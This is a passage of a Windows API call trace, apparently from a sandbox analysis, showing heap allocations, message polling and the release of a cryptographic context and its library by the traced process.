HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0242.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0242.991] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0242.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0242.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f98 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0242.992] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0242.992] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045b0 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0242.993] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045b0 | out: hHeap=0x970000) returned 1 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.993] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0242.993] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f044d0 [0242.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0242.993] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f044d0 | out: hHeap=0x970000) returned 1 [0242.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.994] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0242.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0242.995] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.995] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0242.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0242.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0242.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0242.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69888, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0242.997] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0242.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0242.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.998] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0242.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0242.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.999] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0242.999] FreeLibrary (hLibModule=0x756e0000) returned 1 [0242.999] 